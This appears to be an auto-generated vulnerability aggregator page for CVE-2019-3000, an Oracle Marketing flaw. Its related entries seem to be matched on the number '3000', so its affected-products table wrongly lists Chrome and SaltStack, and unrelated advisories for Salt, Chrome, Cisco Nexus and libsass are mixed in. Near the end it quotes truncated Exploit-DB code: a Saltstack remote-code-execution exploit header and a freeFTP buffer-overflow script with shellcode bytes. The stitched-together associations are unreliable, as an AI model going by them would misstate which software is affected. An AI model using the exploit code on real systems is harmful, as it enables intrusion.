CVE-2019-3000
published 2019-10-16CVE-2019-3000: Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are…
PriorityP342high8.2CVSS 3.1
AVNACLPRNUIRSCCHILAN
EPSS
1.49%
71.5th percentile
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).
Affected
7 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| chrome_chrome | — | — | |
| oracle | marketing | 12.1.1 – 12.1.3 | — |
| oracle | marketing | 12.2.3 – 12.2.9 | — |
| oracle_corporation | marketing | — | — |
| oracle_corporation | marketing | — | — |
| saltstack | salt | >= 0 < 2019.2.4 | 2019.2.4 |
| saltstack | salt | >= 3000 < 3000.2 | 3000.2 |
CVSS provenance
nvdv3.18.2HIGHCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N
nvdv2.05.8MEDIUMAV:N/AC:M/Au:N/C:P/I:P/A:N
vendor_redhat9.8CRITICAL
vendor_cisco6.7MEDIUM
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-w855-pwjh-mxfj: Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration)
ghsa_unreviewed·2022-05-24
CVE-2019-3000 [HIGH] GHSA-w855-pwjh-mxfj: Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration)
Vulnerability in the Oracle Marketing product of Oracle E-Business Suite (component: Marketing Administration). Supported versions that are affected are 12.1.1-12.1.3 and 12.2.3-12.2.9. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Marketing. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Marketing, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Marketing accessible data as well as unauthorized update, insert or delete access to some of Oracle Marketing accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and In
GHSA
SaltStack Salt is vulnerable Arbitrary Directory Access
ghsa·2022-05-24
CVE-2020-11652 [HIGH] CWE-20 SaltStack Salt is vulnerable Arbitrary Directory Access
SaltStack Salt is vulnerable Arbitrary Directory Access
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
GHSA
SaltStack Salt Unauthenticated Remote Code Execution
ghsa·2022-05-24
CVE-2020-11651 [CRITICAL] CWE-20 SaltStack Salt Unauthenticated Remote Code Execution
SaltStack Salt Unauthenticated Remote Code Execution
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
Chrome
Stable Channel Update for Desktop: CVE-2023-1225
vendor_chrome·2023-03-07·CVSS 4.3
CVE-2023-1225 [MEDIUM] Stable Channel Update for Desktop: CVE-2023-1225
Stable Channel Update for Desktop
CVE-2023-1225: Insufficient policy enforcement in Navigation. Reported by Roberto Ffrench-Davis @Lihaft on 2023-01-20 [$3000][ 1013080 ] Medium CVE-2023-1226: Insufficient policy enforcement in Web Payments API
Reported by Anonymous on 2019-10-10 [$3000][ 1348791 ] Medium CVE-2023-1227: Use after free in Core
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2021-38014
vendor_chrome·2021-11-15·CVSS 8.8
CVE-2021-38014 [MEDIUM] Stable Channel Update for Desktop: CVE-2021-38014
Stable Channel Update for Desktop
CVE-2021-38014: Out of bounds write in Swiftshader. Reported by Atte Kettunen of OUSPG on 2021-09-10 [$3000][ 957553 ] Medium CVE-2021-38015: Inappropriate implementation in input
Reported by David Erceg on 2019-04-29 [$3000][ 1244289 ] Medium CVE-2021-38016: Insufficient policy enforcement in background fetch
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2020-6518
vendor_chrome·2020-07-14·CVSS 8.8
CVE-2020-6518 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6518
Stable Channel Update for Desktop
CVE-2020-6518: Use after free in developer tools. Reported by David Erceg on 2019-07-20
[$3000][ 1064676 ] Medium CVE-2020-6519: Policy bypass in CSP
Reported by Wenxu Wu (@ma7h1as) of Tencent Security Xuanwu Lab on 2019-04-23, and also by Gal Weizman (@WeizmanGal) of PerimeterX on 2020-03-25
Severity: medium
Red Hat
salt: salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths
vendor_redhat·2020-04-29·CVSS 6.5
CVE-2020-11652 [MEDIUM] CWE-20 salt: salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths
salt: salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
A flaw was found in salt. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
Statement: Red Hat Ceph Storage 2 shipped salt for the usage of Red Hat Storage Console 2(RHSCON-2), which required salt to administrate ceph nodes. RHSCON-2 has reached End Of Life, hence salt is no longer used and supported. Therefore,
Red Hat
salt: salt-master process ClearFuncs class does not properly validate method calls
vendor_redhat·2020-04-29·CVSS 9.8
CVE-2020-11651 [CRITICAL] CWE-20 salt: salt-master process ClearFuncs class does not properly validate method calls
salt: salt-master process ClearFuncs class does not properly validate method calls
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
An authentication bypass vulnerability was found in Salt, where it is susceptible to arbitrary code execution when processing unauthenticated requests by the ClearFuncs class. This flaw allows an attacker to execute arbitrary code on Salt minions as root.
Statement: Red Hat Ceph Storage 2 shipped salt for the usage of Red Hat Storage Console 2(RHSCON-2), wh
Chrome
Stable Channel Update for Desktop: CVE-2020-6394
vendor_chrome·2020-02-04·CVSS 5.4
CVE-2020-6394 [MEDIUM] Stable Channel Update for Desktop: CVE-2020-6394
Stable Channel Update for Desktop
CVE-2020-6394: Insufficient policy enforcement in Blink. Reported by Phil Freo on 2019-10-15
[$3000][ 1022855 ] Medium CVE-2020-6395: Out of bounds read in JavaScript
Reported by Pierre Langlois from Arm on 2019-11-08
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2019-13703
vendor_chrome·2019-10-22·CVSS 4.3
CVE-2019-13703 [MEDIUM] Stable Channel Update for Desktop: CVE-2019-13703
Stable Channel Update for Desktop
CVE-2019-13703: URL bar spoofing. Reported by Khalil Zhani on 2019-08-12
[$3000][ 1001283 ] Medium CVE-2019-13704: CSP bypass
Reported by Jun Kokatsu, Microsoft Browser Vulnerability Research on 2019-09-05
Severity: medium
Chrome
Stable Channel Update for Desktop: CVE-2019-5873
vendor_chrome·2019-09-10·CVSS 4.3
CVE-2019-5873 [HIGH] Stable Channel Update for Desktop: CVE-2019-5873
Stable Channel Update for Desktop
CVE-2019-5873: URL bar spoofing on iOS. Reported by Khalil Zhani on 2019-07-31
[$3000][ 989797 ] High CVE-2019-5874: External URIs may trigger other browsers
Reported by James Lee (@Windowsrcer) on 2019-08-01
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2019-5875
vendor_chrome·2019-09-10·CVSS 4.3
CVE-2019-5875 [HIGH] Stable Channel Update for Desktop: CVE-2019-5875
Stable Channel Update for Desktop
CVE-2019-5875: URL bar spoof via download redirect. Reported by Khalil Zhani on 2019-06-28
[$3000][ 966914 ] High CVE-2019-13691: Omnibox spoof
Reported by David Erceg on 2019-05-24
Severity: high
Chrome
Stable Channel Update for Desktop: CVE-2019-13681
vendor_chrome·2019-09-10·CVSS 4.3
CVE-2019-13681 [LOW] Stable Channel Update for Desktop: CVE-2019-13681
Stable Channel Update for Desktop
CVE-2019-13681: Bypass on download restrictions. Reported by David Erceg on 2019-06-04
[$3000][ 971917 ] Low CVE-2019-13682: Site isolation bypass
Reported by Jun Kokatsu, Microsoft Browser Vulnerability Research on 2019-06-07
Severity: low
Chrome
Stable Channel Update for Desktop : CVE-2019-5850
vendor_chrome·2019-07-30·CVSS 9.6
CVE-2019-5850 [HIGH] Stable Channel Update for Desktop : CVE-2019-5850
Stable Channel Update for Desktop
CVE-2019-5850: Use-after-free in offline page fetcher. Reported by Brendon Tiszka on 2019-06-21 [$6000][ 956947 ] High CVE-2019-5860: Use-after-free in PDFium
Reported by Anonymous on 2019-04-26 [$3000][ 976627 ] High CVE-2019-5853: Memory corruption in regexp length check
Severity: high
Cisco
Cisco Nexus 3000 Series and 9000 Series Switches in NX-OS Mode CLI Command Software Image Signature Verification Vulnerability
vendor_cisco·2019-05-15·CVSS 6.7
CVE-2019-1810 [MEDIUM] CWE-347 Cisco Nexus 3000 Series and 9000 Series Switches in NX-OS Mode CLI Command Software Image Signature Verification Vulnerability
Cisco Nexus 3000 Series and 9000 Series Switches in NX-OS Mode CLI Command Software Image Signature Verification Vulnerability
A vulnerability in the Image Signature Verification feature used in an NX-OS CLI command in Cisco Nexus 3000 Series and 9000 Series Switches could allow an authenticated, local attacker with administrator-level credentials to install a malicious software image on an affected device.
The vulnerability exists because software digital signatures are not properly verified during CLI command execution. An attacker could exploit this vulnerability to install an unsigned software image on an affected device.
Note: If the device has not been patched for the vulnerability previously disclosed in the Cisco Security Advisory cisco-sa-20190306-nxos-sig-verif, a successful ex
Cisco
Cisco Nexus 3000 Series and 9000 Series Switches in NX-OS Mode CLI Command Software Image Signature Verification Vulnerability
vendor_cisco·CVSS 3.0
CVE-2019-1810 Cisco Nexus 3000 Series and 9000 Series Switches in NX-OS Mode CLI Command Software Image Signature Verification Vulnerability
CVE-2019-1810: Cisco Nexus 3000 Series and 9000 Series Switches in NX-OS Mode CLI Command Software Image Signature Verification Vulnerability
A vulnerability in the Image Signature Verification feature used in an NX-OS CLI command in Cisco Nexus 3000 Series and 9000 Series Switches could allow an authenticated, local attacker with administrator-level credentials to install a malicious software image on an affected device. The vulnerability exists because software digital signatures are not properly verified during CLI command execution. An attacker could exploit this vulnerability to install an unsigned software image on an affected device. Note: If the device has not been patched for the vulnerability previously disclosed in the Cisco Security Advisory cisco-sa-20190306-nxos-sig-verif , a
No detection rules found.
Exploit-DB
Saltstack 3000.1 - Remote Code Execution
exploitdb·2020-05-05·CVSS 9.8
CVE-2020-11652 [CRITICAL] Saltstack 3000.1 - Remote Code Execution
Saltstack 3000.1 - Remote Code Execution
---
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# Date: 2020-05-04
# Exploit Author: Jasper Lievisse Adriaanse
# Vendor Homepage: https://www.saltstack.com/
# Version: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# Tested on: Debian 10 with Salt 2019.2.0
# CVE : CVE-2020-11651 and CVE-2020-11652
# Discription: Saltstack authentication bypass/remote code execution
#
# Source: https://github.com/jasperla/CVE-2020-11651-poc
# This exploit is based on this checker script:
# https://github.com/rossengeorgiev/salt-security-backports
#!/usr/bin/env python
#
# Exploit for CVE-2020-11651 and CVE-2020-11652
# Written by Jasper Lievisse Adriaanse (https://github.com/jasperla/CVE-2020-11651-poc)
# This exploit is based on this checker script:
# https:/
Exploit-DB
freeFTP 1.0.8 - 'PASS' Remote Buffer Overflow
exploitdb·2019-10-07
freeFTP 1.0.8 - 'PASS' Remote Buffer Overflow
freeFTP 1.0.8 - 'PASS' Remote Buffer Overflow
---
# Exploit Title: freeFTP 1.0.8 - Remote Buffer Overflow
# Date: 2019-09-01
# Author: Chet Manly
# Software Link: https://download.cnet.com/FreeFTP/3000-2160_4-10047242.html
# Version: 1.0.8
# CVE: N/A
from ftplib import FTP
buf = ""
buf += "\x89\xe1\xdb\xdf\xd9\x71\xf4\x5e\x56\x59\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"
buf += "\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"
buf += "\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
buf += "\x58\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x48\x68\x6d"
buf += "\x52\x57\x70\x75\x50\x63\x30\x51\x70\x6c\x49\x38\x65"
buf += "\x64\x71\x79\x50\x31\x74\x6e\x6b\x52\x70\x44\x70\x4e"
buf += "\x6b\x66\x32\x44\x4c\x6c\x4b\x30\x52\x57\x64\x4c\x4b"
buf += "\x43\x42\
Wiz
CVE-2019-25549 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2019-25549 [HIGH] CVE-2019-25549 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2019-25549 :
VeryPDF PDF Editor vulnerability analysis and mitigation
VeryPDF PCL Converter 2.7 contains a denial of service vulnerability that allows local attackers to crash the application by supplying an excessively long password string. Attackers can trigger a buffer overflow by entering a 3000-byte password in the PDF Security encryption fields, causing the application to crash when processing PCL files.
Source : NVD
## 6.9
Score
Published March 21, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
VeryPDF PDF Editor
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
cpe:2.3:a:verypdf:verypdf
Bugzilla
CVE-2019-18797 libsass: uncontrolled recursion in Sass:Eval:operator()(Sass:Binary_Expression*) in eval.cpp
bugzilla·2020-06-29·CVSS 6.5
CVE-2019-18797 [MEDIUM] CVE-2019-18797 libsass: uncontrolled recursion in Sass:Eval:operator()(Sass:Binary_Expression*) in eval.cpp
CVE-2019-18797 libsass: uncontrolled recursion in Sass:Eval:operator()(Sass:Binary_Expression*) in eval.cpp
LibSass 3.6.1 has uncontrolled recursion in Sass::Eval::operator()(Sass::Binary_Expression*) in eval.cpp.
Reference:
https://github.com/sass/libsass/issues/3000
Discussion:
Created libsass tracking bugs for this issue:
Affects: epel-7 [bug 1852073]
Affects: fedora-all [bug 1852072]
---
This bug is now closed. Further updates for individual products will be reflected on the CVE page(s):
https://access.redhat.com/security/cve/cve-2019-18797
Bugzilla
CVE-2020-11651 salt: salt-master process ClearFuncs class does not properly validate method calls
bugzilla·2020-05-06·CVSS 9.8
CVE-2020-11651 [CRITICAL] CVE-2020-11651 salt: salt-master process ClearFuncs class does not properly validate method calls
CVE-2020-11651 salt: salt-master process ClearFuncs class does not properly validate method calls
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class does not properly validate method calls. This allows a remote user to access some methods without authentication. These methods can be used to retrieve user tokens from the salt master and/or run arbitrary commands on salt minions.
References:
https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html
https://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst
Discussion:
Created salt tracking bugs for this issue:
Affects: epel-all [bug 1832475]
Affects: fedora-all [bug 1832476]
---
Statement:
Red Hat Ceph Storage 2 shipped salt for t
Bugzilla
CVE-2020-11652 salt: salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths
bugzilla·2020-05-06·CVSS 6.5
CVE-2020-11652 [MEDIUM] CVE-2020-11652 salt: salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths
CVE-2020-11652 salt: salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths
An issue was discovered in SaltStack Salt before 2019.2.4 and 3000 before 3000.2. The salt-master process ClearFuncs class allows access to some methods that improperly sanitize paths. These methods allow arbitrary directory access to authenticated users.
References:
https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html
https://github.com/saltstack/salt/blob/v3000.2_docs/doc/topics/releases/3000.2.rst
Discussion:
Created salt tracking bugs for this issue:
Affects: epel-all [bug 1832423]
Affects: fedora-all [bug 1832422]
---
Upstream patch: https://github.com/saltstack/salt/commit/cce7abad9c22d9d50ccee2813acabff8deca35dd
---
Statement:
Red Hat Ceph St
2019-10-16
Published